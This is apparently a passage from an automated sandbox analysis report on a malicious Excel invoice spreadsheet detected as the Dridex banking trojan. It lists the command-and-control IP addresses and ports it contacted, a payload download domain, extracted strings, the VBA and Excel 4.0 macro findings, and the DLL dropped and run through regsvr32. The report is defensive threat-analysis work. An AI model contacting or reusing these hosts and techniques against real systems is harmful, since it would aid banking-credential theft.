    Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.27
    Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.27
    Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.27
    Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.27
    Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.27
    Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.27
    Source: unknownTCP traffic detected without corresponding DNS query: 80.86.91.27
    Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
    Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
    Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
    Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
    Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
    Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
    Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
    Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
    Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
    Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
    Source: unknownTCP traffic detected without corresponding DNS query: 5.100.228.233
    Source: unknownTCP traffic detected without corresponding DNS query: 46.105.131.65
    Source: unknownTCP traffic detected without corresponding DNS query: 46.105.131.65
    Source: unknownTCP traffic detected without corresponding DNS query: 46.105.131.65
    Source: unknownTCP traffic detected without corresponding DNS query: 46.105.131.65
    Source: unknownTCP traffic detected without corresponding DNS query: 46.105.131.65
    Source: unknownTCP traffic detected without corresponding DNS query: 46.105.131.65
    Source: unknownTCP traffic detected without corresponding DNS query: 46.105.131.65
    Source: unknownTCP traffic detected without corresponding DNS query: 46.105.131.65
    Source: unknownTCP traffic detected without corresponding DNS query: 46.105.131.65
    Source: unknownTCP traffic detected without corresponding DNS query: 46.105.131.65
    Source: unknownTCP traffic detected without corresponding DNS query: 46.105.131.65
    Source: unknownTCP traffic detected without corresponding DNS query: 46.105.131.65
    Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
    Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
    Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
    Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_008C39F9 InternetReadFile,
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2FECA1BF.emfJump to behavior
    Source: regsvr32.exe, 00000004.00000002.2406932128.000000000036D000.00000004.00000020.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
    Source: DWWIN.EXE, 00000007.00000002.2260615326.0000000003250000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
    Source: regsvr32.exe, 00000004.00000002.2406932128.000000000036D000.00000004.00000020.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
    Source: regsvr32.exe, 00000004.00000003.2205261646.00000000003B1000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2255931534.00000000036B4000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
    Source: unknownDNS traffic detected: queries for: education.scrollx.in
    Source: 3C428B1A3E5F57D887EC4B864FAC5DCC.7.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt
    Source: DWWIN.EXE, 00000007.00000003.2256002610.000000000015E000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
    Source: regsvr32.exe, 00000004.00000003.2205261646.00000000003B1000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2256002610.000000000015E000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
    Source: regsvr32.exe, 00000004.00000003.2205261646.00000000003B1000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2256367652.00000000001E0000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
    Source: regsvr32.exe, 00000004.00000003.2205261646.00000000003B1000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2261028499.000000000369D000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
    Source: regsvr32.exe, 00000004.00000003.2205261646.00000000003B1000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2255931534.00000000036B4000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: regsvr32.exe, 00000004.00000003.2205261646.00000000003B1000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2255931534.00000000036B4000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
    Source: regsvr32.exe, 00000004.00000003.2205261646.00000000003B1000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2255931534.00000000036B4000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
    Source: DWWIN.EXE, 00000007.00000003.2256002610.000000000015E000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
    Source: DWWIN.EXE, 00000007.00000003.2256002610.000000000015E000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
    Source: regsvr32.exe, 00000004.00000003.2205271774.00000000003D0000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2256002610.000000000015E000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
    Source: regsvr32.exe, 00000004.00000002.2406932128.000000000036D000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2256002610.000000000015E000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.4.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
    Source: DWWIN.EXE, 00000007.00000002.2260615326.0000000003250000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
    Source: DWWIN.EXE, 00000007.00000002.2260615326.0000000003250000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
    Source: DWWIN.EXE, 00000007.00000002.2260811324.0000000003437000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
    Source: DWWIN.EXE, 00000007.00000002.2260811324.0000000003437000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
    Source: regsvr32.exe, 00000004.00000003.2205261646.00000000003B1000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2255931534.00000000036B4000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
    Source: regsvr32.exe, 00000004.00000002.2406932128.000000000036D000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2256002610.000000000015E000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
    Source: regsvr32.exe, 00000004.00000003.2205261646.00000000003B1000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2255931534.00000000036B4000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
    Source: regsvr32.exe, 00000004.00000003.2205261646.00000000003B1000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2256002610.000000000015E000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
    Source: regsvr32.exe, 00000004.00000002.2406932128.000000000036D000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000002.2256367652.00000000001E0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
    Source: DWWIN.EXE, 00000007.00000003.2256002610.000000000015E000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
    Source: regsvr32.exe, 00000004.00000003.2205261646.00000000003B1000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2261028499.000000000369D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
    Source: regsvr32.exe, 00000004.00000003.2205261646.00000000003B1000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2256367652.00000000001E0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
    Source: regsvr32.exe, 00000004.00000002.2409391868.0000000002390000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2261214468.0000000004000000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
    Source: regsvr32.exe, 00000003.00000002.2406957167.0000000001D90000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2407102495.00000000009A0000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2257019838.00000000024C0000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
    Source: DWWIN.EXE, 00000007.00000002.2260811324.0000000003437000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
    Source: DWWIN.EXE, 00000007.00000002.2260811324.0000000003437000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
    Source: regsvr32.exe, 00000004.00000002.2409391868.0000000002390000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2261214468.0000000004000000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
    Source: regsvr32.exe, 00000004.00000003.2205261646.00000000003B1000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2256367652.00000000001E0000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
    Source: regsvr32.exe, 00000004.00000003.2205261646.00000000003B1000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2255931534.00000000036B4000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
    Source: DWWIN.EXE, 00000007.00000002.2260615326.0000000003250000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
    Source: DWWIN.EXE, 00000007.00000002.2260811324.0000000003437000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
    Source: DWWIN.EXE, 00000007.00000002.2260615326.0000000003250000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
    Source: DWWIN.EXE, 00000007.00000002.2260615326.0000000003250000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
    Source: regsvr32.exe, 00000004.00000002.2406981782.00000000003DD000.00000004.00000020.sdmpString found in binary or memory: https://46.105.131.65/
    Source: regsvr32.exe, 00000004.00000002.2406981782.00000000003DD000.00000004.00000020.sdmpString found in binary or memory: https://46.105.131.65:1512/
    Source: regsvr32.exe, 00000004.00000002.2406981782.00000000003DD000.00000004.00000020.sdmpString found in binary or memory: https://46.105.131.65:1512/an
    Source: regsvr32.exe, 00000004.00000002.2406981782.00000000003DD000.00000004.00000020.sdmpString found in binary or memory: https://5.100.228.233/
    Source: regsvr32.exe, 00000004.00000002.2406981782.00000000003DD000.00000004.00000020.sdmpString found in binary or memory: https://5.100.228.233/=
    Source: regsvr32.exe, 00000004.00000003.2205277449.00000000003DD000.00000004.00000001.sdmpString found in binary or memory: https://5.100.228.233:3389/
    Source: regsvr32.exe, 00000004.00000002.2406908102.000000000033F000.00000004.00000020.sdmpString found in binary or memory: https://5.100.228.233:3389/H
    Source: regsvr32.exe, 00000004.00000002.2406981782.00000000003DD000.00000004.00000020.sdmpString found in binary or memory: https://5.100.228.233:3389/In
    Source: regsvr32.exe, 00000004.00000002.2406981782.00000000003DD000.00000004.00000020.sdmpString found in binary or memory: https://5.100.228.233:3389/in
    Source: regsvr32.exe, 00000004.00000002.2406908102.000000000033F000.00000004.00000020.sdmpString found in binary or memory: https://5.100.228.233:3389/o
    Source: regsvr32.exe, 00000004.00000002.2406932128.000000000036D000.00000004.00000020.sdmpString found in binary or memory: https://77.220.64.37/-39;
    Source: regsvr32.exe, 00000004.00000002.2406932128.000000000036D000.00000004.00000020.sdmpString found in binary or memory: https://77.220.64.37/0;
    Source: regsvr32.exe, 00000004.00000002.2406981782.00000000003DD000.00000004.00000020.sdmpString found in binary or memory: https://80.86.91.27/
    Source: regsvr32.exe, 00000004.00000002.2406981782.00000000003DD000.00000004.00000020.sdmpString found in binary or memory: https://80.86.91.27:3308/TATE
    Source: regsvr32.exe, 00000004.00000002.2406981782.00000000003DD000.00000004.00000020.sdmpString found in binary or memory: https://80.86.91.27:3308/XPRE
    Source: regsvr32.exe, 00000004.00000003.2205261646.00000000003B1000.00000004.00000001.sdmp, DWWIN.EXE, 00000007.00000003.2256002610.000000000015E000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49346
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49224
    Source: unknownNetwork traffic detected: HTTP traffic on port 49294 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49342
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49220
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49187
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49183
    Source: unknownNetwork traffic detected: HTTP traffic on port 49242 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49374 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49207 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49191 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49199 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49342 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49233 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49338
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49216
    Source: unknownNetwork traffic detected: HTTP traffic on port 49302 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49334
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49179
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49212
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49298
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49330
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
    Source: unknownNetwork traffic detected: HTTP traffic on port 49262 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49294
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
    Source: unknownNetwork traffic detected: HTTP traffic on port 49354 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49290
    Source: unknownNetwork traffic detected: HTTP traffic on port 49224 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49282 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49238 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49322 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49207
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49326
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49203
    Source: unknownNetwork traffic detected: HTTP traffic on port 49187 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49322
    Source: unknownNetwork traffic detected: HTTP traffic on port 49330 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49286
    Source: unknownNetwork traffic detected: HTTP traffic on port 49286 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49318 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49282
    Source: unknownNetwork traffic detected: HTTP traffic on port 49338 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49386 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49258 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49318
    Source: unknownNetwork traffic detected: HTTP traffic on port 49216 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49250 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49314
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49278
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49310
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49398
    Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49274
    Source: unknownNetwork traffic detected: HTTP traffic on port 49394 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49394
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49270
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49390
    Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49278 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49310 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49179 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49366 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49270 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49306
    Source: unknownNetwork traffic detected: HTTP traffic on port 49326 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49302
    Source: unknownNetwork traffic detected: HTTP traffic on port 49290 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49406 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49266
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49386
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49262
    Source: unknownNetwork traffic detected: HTTP traffic on port 49370 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49382
    Source: unknownNetwork traffic detected: HTTP traffic on port 49246 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49378 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49195 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49298 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49306 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49346 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49220 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49258
    Source: unknownNetwork traffic detected: HTTP traffic on port 49266 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49350 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49378
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49410
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49254
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49374
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49250
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49370
    Source: unknownNetwork traffic detected: HTTP traffic on port 49203 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49228 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49358 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49406
    Source: unknownNetwork traffic detected: HTTP traffic on port 49410 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49402
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49246
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49366
    Source: unknownNetwork traffic detected: HTTP traffic on port 49183 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49242
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49362
    Source: unknownNetwork traffic detected: HTTP traffic on port 49334 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49254 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49212 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49382 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49238
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49358
    Source: unknownNetwork traffic detected: HTTP traffic on port 49398 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49233
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49354
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49199
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49350
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49195
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49191
    Source: unknownNetwork traffic detected: HTTP traffic on port 49390 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49314 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49402 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49274 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49362 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49228
    Source: unknownHTTPS traffic detected: 104.27.153.52:443 -> 192.168.2.22:49165 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49166 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49171 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49175 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49179 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49183 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49187 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49191 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49195 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49199 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49203 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49207 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49212 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49216 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49220 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49224 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49228 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49233 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49238 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49242 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49246 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49250 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49254 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49258 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49262 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49266 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49270 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49274 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49278 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49282 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49286 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49290 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49294 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49298 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49302 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49306 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49310 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49314 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49318 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49322 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49326 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49330 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49334 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49338 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49342 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49346 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49350 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49354 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49358 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49362 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49366 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49370 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49374 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49378 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49382 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49386 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49390 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49394 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49398 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49402 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49406 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49410 version: TLS 1.2

    E-Banking Fraud:

    barindex
    Detected Dridex e-Banking trojanShow sources
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00895150 OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,LoadLibraryW,
    Source: C:\Windows\System32\DWWIN.EXEFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCCJump to dropped file

    System Summary:

    barindex
    Document contains an embedded VBA macro which may execute processesShow sources
    Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function pagesREviewsd, API Run("moreP_ab")
    Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function pagesREviewsd, API Run("moreP_ab")
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: Inv0209966048-20210111075675.xlsInitial sample: CALL
    Source: Inv0209966048-20210111075675.xlsInitial sample: CALL
    Office process drops PE fileShow sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\lwjmdgav.dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\w80l82r[1].zipJump to dropped file
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E20000 page execute and read and write
